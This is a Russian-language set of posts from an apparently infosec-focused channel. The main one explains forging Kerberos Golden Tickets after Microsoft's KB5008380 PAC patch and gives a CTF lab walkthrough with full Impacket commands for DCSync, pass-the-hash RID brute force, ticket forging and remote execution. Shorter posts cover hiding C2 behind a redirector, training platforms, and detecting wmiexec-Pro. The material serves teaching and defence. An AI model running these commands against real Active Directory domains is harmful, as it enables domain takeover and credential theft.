Purple Chronicles

Занимательная история про Kerberoasting от имени пользователя с отключённой преаутентифткацией без знания его пароля. Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен🖼️ Синие команды уже настраивают детекты на странный sname в AS-REQ?

🎫Немного о Golden Ticket🎫 Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили! Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️ Для тех, кто не в теме: Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью. Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено. В этом и кроется суть ошибки, которую мы могли наблюдать выше. Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим! Для начала обновите Impacket!

apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/[email protected] -k -no-pass

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

Настало время отвлечься от форензики и чуть-чуть поговорить про AD🖼️ Спешите зарегистрироваться, буду рад всех видеть👀

🚀🚀🚀 29 МАРТА: ЛЕКЦИИ И МАСТЕР-КЛАССЫ ОТ ВЕДУЩИХ СПЕЦИАЛИСТОВ ПО КИБЕРБЕЗОПАСНОСТИ! 🚀🚀🚀 Не пропустите уникальную возможность узнать о последних трендах и методах обеспечения безопасности данных от экспертов отрасли! 🕐 Расписание мероприятий: 10:00 – 10:30 🎙 Доклад: “CTF в реальной жизни” – Павел Шлюндин эксперт управления тестирования на проникновение и киберучений Crosstech Solutions Group 10:30 – 11:30 👨🏻‍🏫 Мастер-класс: “Reverse Fashion Week” – Стародубов Максим старший вирусный аналитик АО "Лаборатория Касперского" 11:30 – 12:00 🎙 Доклад: “Типовые методы удаленного проникновения злоумышленника” – Костомаха Иван старший специалист отдела экспертного обучения ESC Positive Technologies. 12:00 – 12:30 🎙 Доклад: “Обзор методов и средств обеспечения защищенности критически важных объектов” – Литвин Игорь специалист отдела экспертного обучения ESC Positive Technologies. 12:30 - 14:00 👨🏻‍🏫 Мастер-класс. "Анализ вредоносного трафика при атаках на корпоративную инфраструктуру" - Садыков Ильдар руководитель отдела экспертного обучения ESC Positive Technologies. 14:30 - 15:30 👨🏻‍🏫 Мастер-класс. "Attacktive Directory: знакомимся с базовыми атаками на доменные инфраструктуры" - Аникеев Никита исследователь АО "Перспективный мониторинг". 15:30 - 16:00 🎙 Доклад. "Путь багхантера" - Петр Уваров эксперт багбаунти VK. 16:30 - 18:00 👨🏻‍🏫 Дискуссия. Куда пойти работать кибербезнику на ДВ? Модератор - Павлычев Алексей Викторович - директор ЦИБ ДВФУ. Участники: ◾️Перспективный мониторинг ◽️Positive technologies ◾️Crosstech Solutions Group ◽️DNS ◾️Вконтакте ◽️Акцент ◾️Информационный центр. * Для студентов ДВФУ ИМиКТ дополнительный бонус, официальное отсвобождение от занятий. ** Для участия в лекциях необходимо пройти регистрацию *** Для тех, кто хочет, но не может прийти будет подготовленна прямая трансляция в канале

👺Command & Control Redirector: прячем C2 за HTTP-сервером👺 https://telegra.ph/C2-Redirector-01-26 Использование C&C редиректора — приём, которым красные команды могут пользоваться для сокрытия своей C2-инфраструктуры, а злоумышленники — для введения в заблуждение специалистов SOC📖 Сегодня мы поговорим о преимуществах этого метода и посмотрим на него в действии: поднимем небольшую лабораторию, используя в качестве C2-фрэймворка MetaSploit🐧, а в роли редиректора — веб-сервер Ubuntu🐧 + Apache🖼️ Не обойдем стороной и анализ трафика, который мы будем видеть в сети🦈, а напоследок спрячем признаки C2 за простой HTML-страничкой🖼️ #c2 #обучающий

☝️Кстати о площадках☝️ TryHackMe — идеальная точка входа для начинающего специалиста😁 Она не требует специальных знаний и способна познакомить со всеми основными направлениями ИБ: RedTeam, пентест (как веб, так и инфраструктурный), BlueTeam (SOC, security engineering, malware analysis), а со вчерашнего дня даже DevSecOps🖼️🖼️🖼️ THM даёт возможность попробовать себя в каждом из них и помогает определиться с выбором дальнейшего направления развития. Однако, если у вас уже есть некоторый бэкграунд и вы хотите развиваться вглубь, то: 🔵веб — однозначно PortSwigger, лучшие лабы для оттачивания навыков поиска и эксплуатации веб-уязвимостей😈 🔵инфраструктура — HackTheBox, хоть местами чересчур сложно и нестабильно🙃 🔵дефенс — CyberDefenders, где есть серьезные испытания для DFIR-специалистов, аналитиков SOC и охотников за угрозами🛡 Уверен, что каждый найдет себе платформу по душе и будет с огромным стремлением осваивать новые горизонты📖

В мире, где технологии развиваются с огромной скоростью, защита информационных систем становятся все более критичной задачей. Роль ИБ-специалистов становится ключевой в противодействии актуальным киберугрозам👺 Однако, сами по себе знания и навыки, которыми обладают специалисты после ВУЗа, могут потерять свою актуальность уже завтра (если вообще актуальны). Чтобы быть на передовой, необходимо постоянно совершенствовать навыки, изучать новейшие угрозы и технологии, адаптироваться к меняющемуся киберпространству. В сфере информационной безопасности постоянное обучение становится неотъемлемой частью успеха, а стремление развивать профессиональные навыки — важным качеством хорошего специалиста💻 Совместно с коллегами и Cyber Media мы подготовили обзор площадок, которые я считаю ключевыми в освоении различных направлений ИБ: для кого-то они станут входным билетом в практическую безопасность, а для кого-то — новым испытанием на пути профессионального развития

🔥 Обзор платформ для практического обучения: направления Offensive и Defensive В современном цифровом мире безопасность стала одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения уровня защиты. И лучше всего это делать на практике. ➡️ В новой статье на сайте сделали обзор ключевых платформ, предназначенных для практики в направлениях Offensive Security — Hack The Box, PortSwigger Academy, TryHackMe, Root-Me и Defensive Security — Defbox, Letsdefend, Defendtheweb, Cyberdefenders. Отдельно благодарим всех экспертов за уделенное время.

💻Хакер к вам на хост проник? Обнаружим его WMIг!💻 https://telegra.ph/Detecting-wmiexec-Pro-10-28 Разбираем замечательную утилиту wmiexec-Pro, которая приходит на помощь, когда на целевом хосте закрыты SMB, WinRM и RDP. Утилита представляет собой усовершенствованную версию скрипта wmiexec.py из набора Impacket👩‍💻, даёт возможность уклонения от Windows Defender и предлагает модули по обходу AMSI, передаче файлов, удалённому включению RDP с конфигурацией брандмауэра и многое другое🛡 Красным командам советую взять на вооружение🛠 🔎 Но основной упор в статье сделан на детект инструмента как в сетевом трафике, так и в событиях журналов Windows и Sysmon 🔎 А все начиналось с whoami as a SYSTEM... #пентест #блютим #DFIR